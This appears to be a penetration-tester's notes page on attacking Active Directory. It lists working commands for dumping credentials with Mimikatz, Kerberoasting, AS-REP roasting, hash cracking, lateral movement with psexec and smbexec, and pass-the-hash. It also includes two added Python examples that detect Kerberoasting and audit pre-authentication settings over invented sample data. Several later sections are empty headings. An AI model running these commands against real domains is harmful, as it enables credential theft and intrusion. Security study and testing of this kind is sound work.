# Active Directory

When testing Active Directory, our goals should be to:

* gain a foothold on a machine on the domain and elevate our privileges
* enumerate the domain to find additional accounts, users, etc. that ideally increase our privilege level on the domain
* gain access to the domain controller
* persist on the domain (situation dependent)

Assuming that we've already [enumerated](https://notes.oncyberwar.com/3.-enumeration/active-directory) the domain, we should now be focused on gathering credentials to move laterally within the domain.

### Cached credential retrieval

Once you have local admin privileges on a domain-joined computer you can dump the credentials stored in LSASS and the SAM database.

#### Mimikatz

```
mimikatz.exe
privilege::debug
# dump LSASS
sekurlsa::logonpasswords
# dump the SAM database
lsadump::sam
# dump tickets stored in memory
sekurlsa::tickets
# view cached Kerberos tickets for the current user
kerberos::list
```

### Attacks

#### Kerberoasting

If we find interesting service accounts while enumerating, we can request their service tickets and export the Kerberos 5 etype 23 (RC4-HMAC) hash for offline cracking.

```
# Extract SPN hashes
crackmapexec ldap $ldapIPaddress -u user -p pass --kerberoasting hashes.txt
# mimikatz: export cached tickets as .kirbi files
kerberos::list /export

# Crack
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
hashcat -m 13100 hashes.txt /path/to/wordlist -o cracked.txt
```

Alternatively, we can use **Invoke-Kerberoast.ps1** to enumerate SPNs, request tickets, and export them in a format ready for cracking.
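From the defender's side, the same activity shows up in Windows Security event 4769 (a service ticket was requested): the RC4 tickets that the cracking commands above consume have Ticket Encryption Type 0x17, and a roasting run requests many of them for distinct service accounts in a short burst. The following is an added example, not part of the original notes, that flags such bursts over a constructed set of 4769 records; the record layout, account names, SPNs and addresses are invented for the example.

```python
"""Detection-side view of Kerberoasting: flag RC4 (etype 0x17) service-ticket
requests in Windows Security event 4769 and surface accounts that request many
such tickets in a short window."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4769 records (invented values, not real telemetry). Keys mirror the
# event's "Account Name", "Service Name", "Ticket Encryption Type" and "Client Address".
SAMPLE_4769 = [
    {"time": "2024-05-01T09:00:01", "account": "jdoe@CORP.LOCAL",    "service": "svc_sql",    "etype": "0x17", "client": "10.0.0.23"},
    {"time": "2024-05-01T09:00:02", "account": "jdoe@CORP.LOCAL",    "service": "svc_web",    "etype": "0x17", "client": "10.0.0.23"},
    {"time": "2024-05-01T09:00:03", "account": "jdoe@CORP.LOCAL",    "service": "svc_backup", "etype": "0x17", "client": "10.0.0.23"},
    {"time": "2024-05-01T09:00:04", "account": "jdoe@CORP.LOCAL",    "service": "krbtgt",     "etype": "0x12", "client": "10.0.0.23"},
    {"time": "2024-05-01T09:01:00", "account": "asmith@CORP.LOCAL",  "service": "FILESRV01$", "etype": "0x17", "client": "10.0.0.41"},
    {"time": "2024-05-01T09:05:00", "account": "asmith@CORP.LOCAL",  "service": "svc_print",  "etype": "0x12", "client": "10.0.0.41"},
    {"time": "2024-05-01T10:30:00", "account": "bnguyen@CORP.LOCAL", "service": "svc_sql",    "etype": "0x17", "client": "10.0.0.77"},
]

RC4_HMAC = 0x17           # etype 23: the ticket type the cracking commands on this page consume
AES_TYPES = {0x11, 0x12}  # AES128 / AES256: far more expensive to crack offline


def is_rc4_roast_candidate(rec):
    """True when a 4769 record is a ticket an attacker would keep for cracking:
    RC4-encrypted, for a user (not computer) service account, and not the TGT service."""
    service = rec["service"]
    if service.endswith("$") or service.lower() == "krbtgt":
        return False
    return int(rec["etype"], 16) == RC4_HMAC


def find_roasting_bursts(records, window_seconds=300, min_services=3):
    """Return {account: [services]} for accounts that requested RC4 tickets for at
    least `min_services` distinct services within `window_seconds`."""
    per_account = defaultdict(list)
    for rec in records:
        if is_rc4_roast_candidate(rec):
            per_account[rec["account"]].append(
                (datetime.fromisoformat(rec["time"]), rec["service"]))
    window = timedelta(seconds=window_seconds)
    alerts = {}
    for account, events in per_account.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            # distinct services requested from this event forward, inside the window
            services = {svc for t, svc in events[i:] if t - start <= window}
            if len(services) >= min_services:
                alerts[account] = sorted(services)
                break
    return alerts


if __name__ == "__main__":
    for account, services in find_roasting_bursts(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {account}: RC4 tickets for {', '.join(services)}")
```

The burst logic is what keeps this usable: a single RC4 ticket for a legacy service is routine, three or more for different SPNs within minutes from one account is not. Moving service accounts to AES-only encryption (msDS-SupportedEncryptionTypes) and to gMSA or long random passwords makes RC4 tickets for those SPNs rare, which is what gives the alert its signal.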

#### AS-REP Roasting

The AS-REP roasting attack retrieves the AS-REP (encrypted with the user's password hash) for accounts that have Kerberos pre-authentication disabled, so the hash can be cracked offline.

```
# Search for AS-REP roastable users
crackmapexec ldap $ldapIPaddress -u user -p 'pass' --asreproast output.txt
GetNPUsers.py domain/user:pass -dc-ip ipaddress -request -format john -outputfile output.txt

# Crack
john --format=krb5asrep output.txt
hashcat -m 18200 output.txt /path/to/wordlist -o cracked.txt
```
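The property both tools above search for is the DONT_REQ_PREAUTH bit (0x400000) in the account's userAccountControl attribute, which is also what an administrator audits and clears to close the exposure. The following is an added example, not part of the original notes, that decodes that attribute over a constructed set of directory entries, lists the enabled accounts that are exposed, and computes the remediated value; the account names and values are invented, while the flag bits and the LDAP bitwise-AND matching rule OID are the real ones.

```python
"""Audit-side view of AS-REP roasting: decode userAccountControl and list enabled
accounts that have DONT_REQ_PREAUTH set, which is the setting the attack depends on."""

# Bit values from the userAccountControl attribute (only the flags used here).
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "NORMAL_ACCOUNT": 0x0200,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "DONT_REQ_PREAUTH": 0x400000,
}

# LDAP filter using the bitwise-AND matching rule (1.2.840.113556.1.4.803) that returns the
# same set directly from a DC; the code below shows the logic over already-fetched entries.
LDAP_FILTER_NO_PREAUTH = (
    "(&(objectCategory=person)(objectClass=user)"
    "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"
    "(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
)

# Constructed sample entries (invented accounts and values, not from a real directory).
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc_legacy", "userAccountControl": 0x400200},
    {"sAMAccountName": "jdoe",       "userAccountControl": 0x10200},
    {"sAMAccountName": "old_vendor", "userAccountControl": 0x400202},
    {"sAMAccountName": "asmith",     "userAccountControl": 0x200},
]


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def find_asrep_roastable(entries, include_disabled=False):
    """sAMAccountNames with the pre-authentication exemption set. Disabled accounts are
    skipped unless asked for, since a DC will not issue an AS-REP for them anyway."""
    out = []
    for entry in entries:
        uac = entry["userAccountControl"]
        if not uac & UAC_FLAGS["DONT_REQ_PREAUTH"]:
            continue
        if uac & UAC_FLAGS["ACCOUNTDISABLE"] and not include_disabled:
            continue
        out.append(entry["sAMAccountName"])
    return out


def clear_preauth_exemption(value):
    """The remediation: the userAccountControl value to write back with DONT_REQ_PREAUTH cleared."""
    return value & ~UAC_FLAGS["DONT_REQ_PREAUTH"]


if __name__ == "__main__":
    for name in find_asrep_roastable(SAMPLE_ENTRIES):
        entry = next(e for e in SAMPLE_ENTRIES if e["sAMAccountName"] == name)
        uac = entry["userAccountControl"]
        print(f"{name}: {decode_uac(uac)} -> set userAccountControl to {clear_preauth_exemption(uac)}")
```

Run the LDAP filter periodically (or in a scheduled script) and treat any enabled result as a finding; the bit is almost always a leftover from a legacy application that has since been retired, and clearing it costs nothing for clients that support pre-authentication, which is everything modern.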

#### Unconstrained delegation

#### Constrained delegation

#### DCSync

### Lateral movement

Moving laterally within a domain is fairly straightforward once you have credentials.

#### Windows remote management

```
winrs -remote:hostname -u:username -p:password <command>
```

#### PS-Remoting


#### PS-EXEC

```
psexec.py domain/user:password@ipaddress
```

#### SMB-EXEC

```
smbexec.py username:password@ipaddress
```

#### Pass the hash

Pass the hash allows an attacker to authenticate to a remote system with a user's NTLM hash instead of the cleartext password.

{% hint style="info" %}
Many PTH tools require both the LM and NTLM hash as part of the command. If the LM hash is not available you can use a string of 32 zeros in its place.
{% endhint %}

```
# Passing-the-hash Toolkit
pth-winexe -U Administrator%$LMHash:$NTLMHash //$ipaddress cmd

# Mimikatz
privilege::debug
sekurlsa::pth /user:Administrator /domain:test.local /ntlm:$hash

# smbclient.py
smbclient.py -hashes LMHash:NTLMHash domain/user@$ipaddress

# psexec.py
psexec.py -hashes :NTLMhash administrator@ipaddress
```

#### Overpass the hash

The overpass the hash technique uses the NTLM hash to request a Kerberos TGT, so that subsequent authentication goes over Kerberos rather than NTLM.

#### Pass the ticket

### Persistence

#### Golden tickets
